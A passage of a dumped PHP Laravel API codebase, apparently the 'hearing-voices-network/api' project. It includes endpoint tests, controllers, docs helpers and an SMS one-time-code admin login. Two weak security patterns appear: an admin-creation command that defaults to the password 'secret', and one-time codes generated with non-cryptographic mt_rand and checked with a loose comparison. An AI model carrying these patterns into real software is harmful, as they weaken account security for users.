$this->deleteJson(\"/v1/contributions/{$contribution->id}\");\n\n $response->assertStatus(Response::HTTP_UNAUTHORIZED);\n }\n\n /** @test */\n public function end_user_using_someone_elses_cannot_destroy(): void\n {\n $contribution = factory(Contribution::class)->create();\n\n Passport::actingAs(\n factory(EndUser::class)->create()->user\n );\n\n $response = $this->deleteJson(\"/v1/contributions/{$contribution->id}\");\n\n $response->assertStatus(Response::HTTP_FORBIDDEN);\n }\n\n /** @test */\n public function end_user_using_their_own_can_destroy(): void\n {\n $endUser = factory(EndUser::class)->create();\n\n $contribution = factory(Contribution::class)->create([\n 'end_user_id' => $endUser->id,\n ]);\n\n Passport::actingAs($endUser->user);\n\n $response = $this->deleteJson(\"/v1/contributions/{$contribution->id}\");\n\n $response->assertStatus(Response::HTTP_OK);\n }\n\n /** @test */\n public function admin_can_destroy(): void\n {\n $contribution = factory(Contribution::class)->create();\n\n Passport::actingAs(\n factory(Admin::class)->create()->user\n );\n\n $response = $this->deleteJson(\"/v1/contributions/{$contribution->id}\");\n\n $response->assertStatus(Response::HTTP_OK);\n }\n\n /** @test */\n public function database_records_and_relationships_deleted_for_destroy(): void\n {\n /** @var \\App\\Models\\Contribution $contribution */\n $contribution = factory(Contribution::class)->create();\n\n /** @var \\App\\Models\\Tag $tag */\n $tag = factory(Tag::class)->create();\n\n $contribution->tags()->sync($tag->id);\n\n Passport::actingAs(\n factory(Admin::class)->create()->user\n );\n\n $this->deleteJson(\"/v1/contributions/{$contribution->id}\");\n\n $this->assertDatabaseMissing('contributions', ['id' => $contribution->id]);\n $this->assertDatabaseMissing('contribution_tag', [\n 'contribution_id' => $contribution->id,\n 'tag_id' => $tag->id,\n ]);\n $this->assertDatabaseHas('tags', ['id' => $tag->id]);\n }\n\n /** @test */\n public function endpoint_invoked_event_dispatched_for_destroy(): void\n {\n Event::fake([EndpointInvoked::class]);\n\n /** @var \\App\\Models\\User $endUser */\n $endUser = factory(EndUser::class)->create();\n\n /** @var \\App\\Models\\Contribution $contribution*/\n $contribution = factory(Contribution::class)->create([\n 'end_user_id' => $endUser->id,\n ]);\n\n Passport::actingAs($endUser->user);\n\n $this->deleteJson(\"/v1/contributions/{$contribution->id}\");\n\n Event::assertDispatched(\n EndpointInvoked::class,\n function (EndpointInvoked $event) use ($contribution, $endUser): bool {\n return $event->getUser()->is($endUser->user)\n && $event->getClient() === null\n && $event->getAction() === Audit::ACTION_DELETE\n && $event->getDescription() === \"Deleted contribution [{$contribution->id}].\"\n && $event->getIpAddress() === '127.0.0.1'\n && $event->getUserAgent() === 'Symfony';\n }\n );\n }\n}\n"
},
{
"alpha_fraction": 0.663551390171051,
"alphanum_fraction": 0.6647196412086487,
"avg_line_length": 26.612903594970703,
"blob_id": "cd06e834764f442134582511fa08704ef433e929",
"content_id": "4d8dfd9f8d1c838ce982d16c71b65ad5a154b6de",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "PHP",
"length_bytes": 1712,
"license_type": "permissive",
"max_line_length": 84,
"num_lines": 62,
"path": "/app/Http/Controllers/V1/File/RequestController.php",
"repo_name": "hearing-voices-network/api",
"src_encoding": "UTF-8",
"text": "<?php\n\ndeclare(strict_types=1);\n\nnamespace App\\Http\\Controllers\\V1\\File;\n\nuse App\\Events\\EndpointInvoked;\nuse App\\Http\\Controllers\\ApiController;\nuse App\\Http\\Resources\\FileTokenResource;\nuse App\\Models\\File;\nuse App\\Models\\FileToken;\nuse App\\Services\\FileService;\nuse App\\Support\\Pagination;\nuse Illuminate\\Http\\Request;\nuse Illuminate\\Http\\Resources\\Json\\JsonResource;\nuse Illuminate\\Support\\Facades\\DB;\n\nclass RequestController extends ApiController\n{\n /**\n * @var \\App\\Services\\FileService\n */\n protected $fileService;\n\n /**\n * RequestController constructor.\n *\n * @param \\Illuminate\\Http\\Request $request\n * @param \\App\\Support\\Pagination $pagination\n * @param \\App\\Services\\FileService $fileService\n */\n public function __construct(\n Request $request,\n Pagination $pagination,\n FileService $fileService\n ) {\n parent::__construct($request, $pagination);\n\n $this->middleware(['auth:api', 'verified']);\n\n $this->fileService = $fileService;\n }\n\n /**\n * @param \\Illuminate\\Http\\Request $request\n * @param \\App\\Models\\File $file\n * @throws \\Illuminate\\Auth\\Access\\AuthorizationException\n * @return \\Illuminate\\Http\\Resources\\Json\\JsonResource\n */\n public function __invoke(Request $request, File $file): JsonResource\n {\n $this->authorize('request', $file);\n\n $fileToken = DB::transaction(function () use ($request, $file): FileToken {\n return $this->fileService->request($file, $request->user('api')->admin);\n });\n\n event(EndpointInvoked::onCreate($request, \"Requested file [{$file->id}].\"));\n\n return new FileTokenResource($fileToken);\n }\n}\n"
},
{
"alpha_fraction": 0.6736842393875122,
"alphanum_fraction": 0.6842105388641357,
"avg_line_length": 8.5,
"blob_id": "17ce62f85a7fa1a73da73d4142499b8877e27734",
"content_id": "74df5f2a45c827f88ab5c60d1e726cda36bca303",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "PHP",
"length_bytes": 95,
"license_type": "permissive",
"max_line_length": 30,
"num_lines": 10,
"path": "/app/Models/Mutators/UserMutators.php",
"repo_name": "hearing-voices-network/api",
"src_encoding": "UTF-8",
"text": "<?php\n\ndeclare(strict_types=1);\n\nnamespace App\\Models\\Mutators;\n\ntrait UserMutators\n{\n //\n}\n"
},
{
"alpha_fraction": 0.6702127456665039,
"alphanum_fraction": 0.6808510422706604,
"avg_line_length": 8.399999618530273,
"blob_id": "847d870bfa7a27da7bccf02780a432f7de2e326e",
"content_id": "35619810ef5f8a61d9828ddac37724ea1781dd68",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "PHP",
"length_bytes": 94,
"license_type": "permissive",
"max_line_length": 28,
"num_lines": 10,
"path": "/app/Models/Scopes/EndUserScopes.php",
"repo_name": "hearing-voices-network/api",
"src_encoding": "UTF-8",
"text": "<?php\n\ndeclare(strict_types=1);\n\nnamespace App\\Models\\Scopes;\n\ntrait EndUserScopes\n{\n //\n}\n"
},
{
"alpha_fraction": 0.5135278701782227,
"alphanum_fraction": 0.5140583515167236,
"avg_line_length": 24.133333206176758,
"blob_id": "4b94b5d62df252c4f9d4ade53bbfb0b19faf36f4",
"content_id": "90c0e19fd3df3615b91d1ba27f17e36d04c4f06d",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "PHP",
"length_bytes": 1885,
"license_type": "permissive",
"max_line_length": 85,
"num_lines": 75,
"path": "/app/Docs/Utils.php",
"repo_name": "hearing-voices-network/api",
"src_encoding": "UTF-8",
"text": "<?php\n\ndeclare(strict_types=1);\n\nnamespace App\\Docs;\n\nuse App\\Models\\Admin;\nuse App\\Models\\EndUser;\nuse GoldSpecDigital\\ObjectOrientedOAS\\Exceptions\\InvalidArgumentException;\n\nclass Utils\n{\n /**\n * Utils constructor.\n */\n protected function __construct()\n {\n // Prevent instantiation.\n }\n\n /**\n * @param array $accessibleBy\n * @param string|null $description\n * @throws \\GoldSpecDigital\\ObjectOrientedOAS\\Exceptions\\InvalidArgumentException\n * @return string\n */\n public static function operationDescription(\n array $accessibleBy,\n string $description = null\n ): string {\n // Only allow an array of strings.\n foreach ($accessibleBy as $accessor) {\n if (is_string($accessor)) {\n continue;\n }\n\n throw new InvalidArgumentException();\n }\n\n // Format the accessible by into markdown.\n $accessibleBy = collect($accessibleBy)\n ->map(function (string $accessor): string {\n // If class names passed in then convert to meaningful names.\n switch ($accessor) {\n case Admin::class:\n $accessor = 'Admins';\n break;\n case EndUser::class:\n $accessor = 'End users';\n break;\n }\n\n return \"* `{$accessor}`\";\n })\n ->implode(PHP_EOL);\n\n // Prepare the required markdown string.\n $markdown = <<<EOT\n ### Access control\n $accessibleBy\n EOT;\n\n // Append the optional description if provided.\n if ($description) {\n $markdown .= <<<EOT\n \n \n ### Description\n $description\n EOT;\n }\n\n return $markdown;\n }\n}\n"
},
{
"alpha_fraction": 0.5239889025688171,
"alphanum_fraction": 0.5317208766937256,
"avg_line_length": 28.67058753967285,
"blob_id": "8744121fe3863af09696d1739ae5500604c5b414",
"content_id": "97c8749e3132c3ae02d2cb09118276c4c9c4ce53",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "PHP",
"length_bytes": 10088,
"license_type": "permissive",
"max_line_length": 98,
"num_lines": 340,
"path": "/tests/Feature/V1/NotificationControllerTest.php",
"repo_name": "hearing-voices-network/api",
"src_encoding": "UTF-8",
"text": "<?php\n\ndeclare(strict_types=1);\n\nnamespace Tests\\Feature\\V1;\n\nuse App\\Events\\EndpointInvoked;\nuse App\\Models\\Admin;\nuse App\\Models\\Audit;\nuse App\\Models\\EndUser;\nuse App\\Models\\Notification;\nuse Illuminate\\Http\\Response;\nuse Illuminate\\Support\\Facades\\Date;\nuse Illuminate\\Support\\Facades\\Event;\nuse Laravel\\Passport\\Passport;\nuse Tests\\TestCase;\n\nclass NotificationControllerTest extends TestCase\n{\n /*\n * Index.\n */\n\n /** @test */\n public function guest_cannot_index(): void\n {\n $response = $this->getJson('/v1/notifications');\n\n $response->assertStatus(Response::HTTP_UNAUTHORIZED);\n }\n\n /** @test */\n public function end_user_cannot_index(): void\n {\n Passport::actingAs(\n factory(EndUser::class)->create()->user\n );\n\n $response = $this->getJson('/v1/notifications');\n\n $response->assertStatus(Response::HTTP_FORBIDDEN);\n }\n\n /** @test */\n public function admin_can_index(): void\n {\n Passport::actingAs(\n factory(Admin::class)->create()->user\n );\n\n $response = $this->getJson('/v1/notifications');\n\n $response->assertStatus(Response::HTTP_OK);\n }\n\n /** @test */\n public function structure_correct_for_index(): void\n {\n factory(Notification::class)->create();\n\n Passport::actingAs(\n factory(Admin::class)->create()->user\n );\n\n $response = $this->getJson('/v1/notifications');\n\n $response->assertCollectionDataStructure([\n 'id',\n 'admin_id',\n 'end_user_id',\n 'channel',\n 'recipient',\n 'content',\n 'sent_at',\n 'created_at',\n 'updated_at',\n ]);\n }\n\n /** @test */\n public function values_correct_for_index(): void\n {\n $notification = factory(Notification::class)->create();\n\n Passport::actingAs(\n factory(Admin::class)->create()->user\n );\n\n $response = $this->getJson('/v1/notifications');\n\n $response->assertJsonFragment([\n [\n 'id' => $notification->id,\n 'admin_id' => $notification->admin_id,\n 'end_user_id' => $notification->end_user_id,\n 'channel' => $notification->channel,\n 'recipient' => $notification->recipient,\n 'content' => $notification->content,\n 'sent_at' => null,\n 'created_at' => $notification->created_at->toIso8601String(),\n 'updated_at' => $notification->updated_at->toIso8601String(),\n ],\n ]);\n }\n\n /** @test */\n public function can_filter_by_ids_for_index(): void\n {\n $notification1 = factory(Notification::class)->create();\n $notification2 = factory(Notification::class)->create();\n $notification3 = factory(Notification::class)->create();\n\n Passport::actingAs(\n factory(Admin::class)->create()->user\n );\n\n $response = $this->getJson('/v1/notifications', [\n 'filter[id]' => \"{$notification1->id},{$notification2->id}\",\n ]);\n\n $response->assertJsonFragment(['id' => $notification1->id]);\n $response->assertJsonFragment(['id' => $notification2->id]);\n $response->assertJsonMissing(['id' => $notification3->id]);\n }\n\n /** @test */\n public function can_filter_by_admin_id_for_index(): void\n {\n $admin1 = factory(Admin::class)->create();\n $admin2 = factory(Admin::class)->create();\n\n $notification1 = factory(Notification::class)->create([\n 'user_id' => $admin1->user->id,\n ]);\n $notification2 = factory(Notification::class)->create([\n 'user_id' => $admin2->user->id,\n ]);\n\n Passport::actingAs(\n factory(Admin::class)->create([\n 'name' => 'Test',\n ])->user\n );\n\n $response = $this->getJson('/v1/notifications', ['filter[admin_id]' => $admin1->id]);\n\n $response->assertJsonFragment(['id' => $notification1->id]);\n $response->assertJsonMissing(['id' => $notification2->id]);\n }\n\n /** @test */\n public function can_filter_by_end_user_id_for_index(): void\n {\n $endUser1 = factory(EndUser::class)->create();\n $endUser2 = factory(EndUser::class)->create();\n\n $notification1 = factory(Notification::class)->create([\n 'user_id' => $endUser1->user->id,\n ]);\n $notification2 = factory(Notification::class)->create([\n 'user_id' => $endUser2->user->id,\n ]);\n\n Passport::actingAs(\n factory(Admin::class)->create([\n 'name' => 'Test',\n ])->user\n );\n\n $response = $this->getJson('/v1/notifications', ['filter[end_user_id]' => $endUser1->id]);\n\n $response->assertJsonFragment(['id' => $notification1->id]);\n $response->assertJsonMissing(['id' => $notification2->id]);\n }\n\n /** @test */\n public function can_sort_by_created_at_for_index(): void\n {\n $notification1 = factory(Notification::class)->create([\n 'created_at' => Date::now(),\n ]);\n $notification2 = factory(Notification::class)->create([\n 'created_at' => Date::now()->addHour(),\n ]);\n\n Passport::actingAs(\n factory(Admin::class)->create()->user\n );\n\n $response = $this->getJson('/v1/notifications', ['sort' => '-created_at']);\n\n $response->assertNthIdInCollection(1, $notification1->id);\n $response->assertNthIdInCollection(0, $notification2->id);\n }\n\n /** @test */\n public function endpoint_invoked_event_dispatched_for_index(): void\n {\n Event::fake([EndpointInvoked::class]);\n\n /** @var \\App\\Models\\User $user */\n $user = factory(Admin::class)->create()->user;\n\n Passport::actingAs($user);\n\n $this->getJson('/v1/notifications');\n\n Event::assertDispatched(\n EndpointInvoked::class,\n function (EndpointInvoked $event) use ($user): bool {\n return $event->getUser()->is($user)\n && $event->getClient() === null\n && $event->getAction() === Audit::ACTION_READ\n && $event->getDescription() === 'Viewed all notifications.'\n && $event->getIpAddress() === '127.0.0.1'\n && $event->getUserAgent() === 'Symfony';\n }\n );\n }\n\n /*\n * Show/\n */\n\n /** @test */\n public function guest_cannot_show(): void\n {\n $notification = factory(Notification::class)->create();\n\n $response = $this->getJson(\"/v1/notifications/{$notification->id}\");\n\n $response->assertStatus(Response::HTTP_UNAUTHORIZED);\n }\n\n /** @test */\n public function end_user_cannot_show(): void\n {\n $notification = factory(Notification::class)->create();\n\n Passport::actingAs(\n factory(EndUser::class)->create()->user\n );\n\n $response = $this->getJson(\"/v1/notifications/{$notification->id}\");\n\n $response->assertStatus(Response::HTTP_FORBIDDEN);\n }\n\n /** @test */\n public function admin_can_show(): void\n {\n $notification = factory(Notification::class)->create();\n\n Passport::actingAs(\n factory(Admin::class)->create()->user\n );\n\n $response = $this->getJson(\"/v1/notifications/{$notification->id}\");\n\n $response->assertStatus(Response::HTTP_OK);\n }\n\n /** @test */\n public function structure_correct_for_show(): void\n {\n $notification = factory(Notification::class)->create();\n\n Passport::actingAs(\n factory(Admin::class)->create()->user\n );\n\n $response = $this->getJson(\"/v1/notifications/{$notification->id}\");\n\n $response->assertResourceDataStructure([\n 'id',\n 'admin_id',\n 'end_user_id',\n 'channel',\n 'recipient',\n 'content',\n 'sent_at',\n 'created_at',\n 'updated_at',\n ]);\n }\n\n /** @test */\n public function values_correct_for_show(): void\n {\n $notification = factory(Notification::class)->create();\n\n Passport::actingAs(\n factory(Admin::class)->create()->user\n );\n\n $response = $this->getJson(\"/v1/notifications/{$notification->id}\");\n\n $response->assertJsonFragment([\n [\n 'id' => $notification->id,\n 'admin_id' => $notification->admin_id,\n 'end_user_id' => $notification->end_user_id,\n 'channel' => $notification->channel,\n 'recipient' => $notification->recipient,\n 'content' => $notification->content,\n 'sent_at' => null,\n 'created_at' => $notification->created_at->toIso8601String(),\n 'updated_at' => $notification->updated_at->toIso8601String(),\n ],\n ]);\n }\n\n /** @test */\n public function endpoint_invoked_event_dispatched_for_show(): void\n {\n Event::fake([EndpointInvoked::class]);\n\n /** @var \\App\\Models\\User $user */\n $user = factory(Admin::class)->create()->user;\n\n /** @var \\App\\Models\\Notification $notifcation */\n $notification = factory(Notification::class)->create();\n\n Passport::actingAs($user);\n\n $this->getJson(\"/v1/notifications/{$notification->id}\");\n\n Event::assertDispatched(\n EndpointInvoked::class,\n function (EndpointInvoked $event) use ($user, $notification): bool {\n return $event->getUser()->is($user)\n && $event->getClient() === null\n && $event->getAction() === Audit::ACTION_READ\n && $event->getDescription() === \"Viewed notification [{$notification->id}].\"\n && $event->getIpAddress() === '127.0.0.1'\n && $event->getUserAgent() === 'Symfony';\n }\n );\n }\n}\n"
},
{
"alpha_fraction": 0.5309892892837524,
"alphanum_fraction": 0.5315852165222168,
"avg_line_length": 23.676469802856445,
"blob_id": "ce753b6fe090021ce9a6346f0c2fcc95f5d84848",
"content_id": "46072af8c17665472b4fd253ddb73ebd5414f0d8",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "PHP",
"length_bytes": 1678,
"license_type": "permissive",
"max_line_length": 77,
"num_lines": 68,
"path": "/app/Console/Commands/Cv/Make/AdminCommand.php",
"repo_name": "hearing-voices-network/api",
"src_encoding": "UTF-8",
"text": "<?php\n\ndeclare(strict_types=1);\n\nnamespace App\\Console\\Commands\\Cv\\Make;\n\nuse App\\Services\\AdminService;\nuse Illuminate\\Console\\Command;\nuse Illuminate\\Support\\Facades\\DB;\n\nclass AdminCommand extends Command\n{\n /**\n * The name and signature of the console command.\n *\n * @var string\n */\n protected $signature = \"cv:make:admin\n {name : The admin's name}\n {email : The admin's email}\n {phone : The admin's phone number}\n {--password= : The password to use}\";\n\n /**\n * The console command description.\n *\n * @var string\n */\n protected $description = 'Create a new admin user';\n\n /**\n * @var \\App\\Services\\AdminService\n */\n protected $adminService;\n\n /**\n * AdminCommand constructor.\n *\n * @param \\App\\Services\\AdminService $adminService\n */\n public function __construct(AdminService $adminService)\n {\n parent::__construct();\n\n $this->adminService = $adminService;\n }\n\n /**\n * Execute the console command.\n *\n * @throws \\Throwable\n */\n public function handle(): void\n {\n $password = $this->option('password') ?? 'secret';\n\n DB::transaction(function () use ($password): void {\n $this->adminService->create([\n 'name' => $this->argument('name'),\n 'phone' => $this->argument('phone'),\n 'email' => $this->argument('email'),\n 'password' => $password,\n ]);\n });\n\n $this->warn(\"Admin successfully created with password: {$password}\");\n }\n}\n"
},
{
"alpha_fraction": 0.590552568435669,
"alphanum_fraction": 0.5930481553077698,
"avg_line_length": 28.371726989746094,
"blob_id": "16b5e73a8d7064adf2e010d810a3aba3fc68c19a",
"content_id": "26cdb17469a870a3867d6620f39701f687e82bbc",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "PHP",
"length_bytes": 5610,
"license_type": "permissive",
"max_line_length": 90,
"num_lines": 191,
"path": "/app/Http/Controllers/Auth/Admin/LoginController.php",
"repo_name": "hearing-voices-network/api",
"src_encoding": "UTF-8",
"text": "<?php\n\ndeclare(strict_types=1);\n\nnamespace App\\Http\\Controllers\\Auth\\Admin;\n\nuse App\\Http\\Controllers\\WebController;\nuse App\\Models\\User;\nuse App\\Sms\\GenericSms;\nuse Illuminate\\Contracts\\View\\View;\nuse Illuminate\\Foundation\\Auth\\AuthenticatesUsers;\nuse Illuminate\\Http\\RedirectResponse;\nuse Illuminate\\Http\\Request;\nuse Illuminate\\Support\\Facades\\Auth;\nuse Illuminate\\Support\\Facades\\Config;\nuse Illuminate\\Support\\Facades\\Lang;\nuse Illuminate\\Support\\Str;\nuse Illuminate\\Validation\\ValidationException;\n\nclass LoginController extends WebController\n{\n /*\n |--------------------------------------------------------------------------\n | Login Controller\n |--------------------------------------------------------------------------\n |\n | This controller handles authenticating users for the application and\n | redirecting them to your home screen. The controller uses a trait\n | to conveniently provide its functionality to your applications.\n |\n */\n\n use AuthenticatesUsers;\n\n /**\n * Where to redirect users after login.\n *\n * @var string\n */\n protected $redirectTo = '/';\n\n /**\n * LoginController constructor.\n */\n public function __construct()\n {\n $this->middleware('guest:web')->except('logout');\n $this->middleware('otp')->only('showOtpForm', 'otp');\n }\n\n /**\n * Show the application's login form.\n *\n * @return \\Illuminate\\Contracts\\View\\View\n */\n public function showLoginForm(): View\n {\n return view('admin.auth.login');\n }\n\n /**\n * The user has been authenticated.\n *\n * @param \\Illuminate\\Http\\Request $request\n * @param \\App\\Models\\User $user\n * @return \\Illuminate\\Http\\RedirectResponse|null\n */\n protected function authenticated(Request $request, User $user): ?RedirectResponse\n {\n // If OTP is disabled then skip this method.\n if (!Config::get('connecting_voices.otp_enabled')) {\n return null;\n }\n\n // Log user out.\n $this->guard()->logout();\n\n // Place the user ID in the session.\n session()->put('otp.user_id', $user->id);\n\n // Generate and send the OTP code.\n $otpCode = mt_rand(10000, 99999);\n session()->put('otp.code', $otpCode);\n $this->dispatchNow(\n new GenericSms($user->admin->phone, \"{$otpCode} is your authentication code.\")\n );\n\n // Forward the user to the code page.\n return redirect(route('auth.admin.login.code'));\n }\n\n /**\n * @return \\Illuminate\\Contracts\\View\\View\n */\n public function showOtpForm(): View\n {\n return view('admin.auth.one-time-password');\n }\n\n /**\n * @param \\Illuminate\\Http\\Request $request\n * @return \\Illuminate\\Http\\RedirectResponse\n */\n public function otp(Request $request): RedirectResponse\n {\n // If the class is using the ThrottlesLogins trait, we can automatically throttle\n // the login attempts for this application. We'll key this by the username and\n // the IP address of the client making these requests into this application.\n if ($this->hasTooManyLoginAttempts($request)) {\n $this->fireLockoutEvent($request);\n\n // Throw an exception and exit the method.\n $this->sendOtpLockoutResponse($request);\n }\n\n // Validate the OTP code and login if correct.\n if ($request->code == $request->session()->get('otp.code')) {\n $userId = $request->session()->get('otp.user_id');\n $this->guard()->login(User::findOrFail($userId));\n\n $request->session()->regenerate();\n\n $this->clearLoginAttempts($request);\n\n session()->forget(['otp.user_id', 'otp.code']);\n\n return redirect()->intended($this->redirectPath());\n }\n\n // If the login attempt was unsuccessful we will increment the number of attempts\n // to login and redirect the user back to the login form. Of course, when this\n // user surpasses their maximum number of attempts they will get locked out.\n $this->incrementLoginAttempts($request);\n\n $this->sendFailedOtpResponse($request);\n }\n\n /**\n * Redirect the user after determining they are locked out.\n *\n * @param \\Illuminate\\Http\\Request $request\n */\n protected function sendOtpLockoutResponse(Request $request): void\n {\n $seconds = $this->limiter()->availableIn(\n $this->throttleKey($request)\n );\n\n throw ValidationException::withMessages([\n 'code' => [Lang::get('auth.throttle', ['seconds' => $seconds])],\n ])->status(429);\n }\n\n /**\n * Get the failed login response instance.\n *\n * @param \\Illuminate\\Http\\Request $request\n */\n protected function sendFailedOtpResponse(Request $request): void\n {\n throw ValidationException::withMessages([\n 'code' => ['The code provided is incorrect.'],\n ]);\n }\n\n /**\n * Get the throttle key for the given request.\n *\n * @param \\Illuminate\\Http\\Request $request\n * @return string\n */\n protected function throttleKey(Request $request): string\n {\n $key = session()->get(\n 'otp.user_id',\n Str::lower($request->input($this->username()))\n );\n\n return $key . '|' . $request->ip();\n }\n\n /**\n * Get the guard to be used during authentication.\n *\n * @return \\Illuminate\\Contracts\\Auth\\StatefulGuard\n */\n protected function guard()\n {\n return Auth::guard('web');\n }\n}\n"
},
{
"alpha_fraction": 0.6518218517303467,
"alphanum_fraction": 0.6538461446762085,
"avg_line_length": 23.700000762939453,
"blob_id": "1454afa8296f824ac7d3a246cf69e54830fb01ef",
"content_id": "a91e2ed6e236d4bf6c39f8dc854af25e7283fedb",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "PHP",
"length_bytes": 494,
"license_type": "permissive",
"max_line_length": 62,
"num_lines": 20,
"path": "/database/factories/UserFactory.php",
"repo_name": "hearing-voices-network/api",
"src_encoding": "UTF-8",
"text": "<?php\n\ndeclare(strict_types=1);\n\nuse App\\Models\\User;\nuse Faker\\Generator as Faker;\nuse Illuminate\\Support\\Facades\\Date;\nuse Illuminate\\Support\\Facades\\Hash;\n\n/** @var \\Illuminate\\Database\\Eloquent\\Factory $factory */\n$factory->define(User::class, function (Faker $faker): array {\n return [\n 'email' => $faker->unique()->safeEmail,\n 'password' => Hash::make('secret'),\n ];\n});\n\n$factory->state(User::class, 'emailVerified', [\n 'email_verified_at' => Date::now(),\n]);\n"
},
{
"alpha_fraction": 0.6625899076461792,
"alphanum_fraction": 0.6633093357086182,
"avg_line_length": 32.095237731933594,
"blob_id": "eed01a0a65b879695d4ccf16eda97f4746685080",
"content_id": "3411617c56808153efa68c6cb18e15363bea9dc2",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "PHP",
"length_bytes": 1390,
"license_type": "permissive",
"max_line_length": 85,
"num_lines": 42,
"path": "/app/Docs/Operations/Notifications/ShowNotificationOperation.php",
"repo_name": "hearing-voices-network/api",
"src_encoding": "UTF-8",
"text": "<?php\n\ndeclare(strict_types=1);\n\nnamespace App\\Docs\\Operations\\Notifications;\n\nuse App\\Docs\\Schemas\\Notification\\NotificationSchema;\nuse App\\Docs\\Schemas\\ResourceSchema;\nuse App\\Docs\\Tags\\NotificationsTag;\nuse App\\Docs\\Utils;\nuse App\\Models\\Admin;\nuse GoldSpecDigital\\ObjectOrientedOAS\\Objects\\BaseObject;\nuse GoldSpecDigital\\ObjectOrientedOAS\\Objects\\MediaType;\nuse GoldSpecDigital\\ObjectOrientedOAS\\Objects\\Operation;\nuse GoldSpecDigital\\ObjectOrientedOAS\\Objects\\Response;\n\nclass ShowNotificationOperation extends Operation\n{\n /**\n * @param string|null $objectId\n * @throws \\GoldSpecDigital\\ObjectOrientedOAS\\Exceptions\\InvalidArgumentException\n * @throws \\ReflectionException\n * @return \\GoldSpecDigital\\ObjectOrientedOAS\\Objects\\Operation\n */\n public static function create(string $objectId = null): BaseObject\n {\n return parent::create($objectId)\n ->action(static::ACTION_GET)\n ->summary('Get a specific notification')\n ->description(\n Utils::operationDescription([Admin::class])\n )\n ->tags(NotificationsTag::create())\n ->responses(\n Response::ok()->content(\n MediaType::json()->schema(\n ResourceSchema::create(null, NotificationSchema::create())\n )\n )\n );\n }\n}\n"
},
{
"alpha_fraction": 0.6156501770019531,
"alphanum_fraction": 0.6168009042739868,
"avg_line_length": 21.28205108642578,
"blob_id": "f1f3c200e474d6639c5e5f6ce130856e30872c95",
"content_id": "24abe6557bd8338a8410bb938c490368aca30721",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "PHP",
"length_bytes": 869,
"license_type": "permissive",
"max_line_length": 75,
"num_lines": 39,
"path": "/app/VariableSubstitution/Email/Admin/NewEndUserSubstituter.php",
"repo_name": "hearing-voices-network/api",
"src_encoding": "UTF-8",
"text": "<?php\n\ndeclare(strict_types=1);\n\nnamespace App\\VariableSubstitution\\Email\\Admin;\n\nuse App\\Models\\EndUser;\nuse App\\VariableSubstitution\\BaseVariableSubstituter;\nuse Illuminate\\Support\\Facades\\Config;\n\nclass NewEndUserSubstituter extends BaseVariableSubstituter\n{\n /**\n * @var \\App\\Models\\EndUser\n */\n protected $endUser;\n\n /**\n * NewEndUserSubstituter constructor.\n *\n * @param \\App\\Models\\EndUser $endUser\n */\n public function __construct(EndUser $endUser)\n {\n $this->endUser = $endUser;\n }\n\n /**\n * @return array\n */\n protected function variables(): array\n {\n return [\n 'END_USER_EMAIL' => $this->endUser->user->email,\n 'END_USER_CREATED_AT' => $this->endUser->user->created_at\n ->format(Config::get('connecting_voices.datetime_format')),\n ];\n }\n}\n"
},
{
"alpha_fraction": 0.597183108329773,
"alphanum_fraction": 0.5985915660858154,
"avg_line_length": 18.72222137451172,
"blob_id": "f630e2a3bc841bbf7611e469840c11cf98c136ef",
"content_id": "d78aee8c9cac8a4b67fb4cff253ca269d94a2a1c",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "PHP",
"length_bytes": 710,
"license_type": "permissive",
"max_line_length": 58,
"num_lines": 36,
"path": "/app/Rules/ParentTagIsTopLevel.php",
"repo_name": "hearing-voices-network/api",
"src_encoding": "UTF-8",
"text": "<?php\n\ndeclare(strict_types=1);\n\nnamespace App\\Rules;\n\nuse App\\Models\\Tag;\nuse Illuminate\\Contracts\\Validation\\Rule;\n\nclass ParentTagIsTopLevel implements Rule\n{\n /**\n * Determine if the validation rule passes.\n *\n * @param string $attribute\n * @param string $parentTagId\n * @return bool\n */\n public function passes($attribute, $parentTagId): bool\n {\n /** @var \\App\\Models\\Tag $tag */\n $tag = Tag::findOrFail($parentTagId);\n\n return $tag->isTopLevel();\n }\n\n /**\n * Get the validation error message.\n *\n * @return string\n */\n public function message(): string\n {\n return 'The parent tag must be a top level tag.';\n }\n}\n"
},
{
"alpha_fraction": 0.7404580116271973,
"alphanum_fraction": 0.7480915784835815,
"avg_line_length": 12.100000381469727,
"blob_id": "b361ca1fcfc8e96608c943be352e56361bdae94f",
"content_id": "1f373fcd9c5d55756bf9512cd79febe159c5cdf6",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "PHP",
"length_bytes": 131,
"license_type": "permissive",
"max_line_length": 49,
"num_lines": 10,
"path": "/app/Docs/Schemas/Setting/UpdateSettingsSchema.php",
"repo_name": "hearing-voices-network/api",
"src_encoding": "UTF-8",
"text": "<?php\n\ndeclare(strict_types=1);\n\nnamespace App\\Docs\\Schemas\\Setting;\n\nclass UpdateSettingsSchema extends SettingsSchema\n{\n //\n}\n"
},
{
"alpha_fraction": 0.5993150472640991,
"alphanum_fraction": 0.6050228476524353,
"avg_line_length": 24.764705657958984,
"blob_id": "ae7193f9abe20a49de9ddd829fc2f8c54ca6a423",
"content_id": "e282c5c6214820c402c51304e54b7dd3b7a135a4",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "PHP",
"length_bytes": 876,
"license_type": "permissive",
"max_line_length": 89,
"num_lines": 34,
"path": "/app/Http/Resources/FileTokenResource.php",
"repo_name": "hearing-voices-network/api",
"src_encoding": "UTF-8",
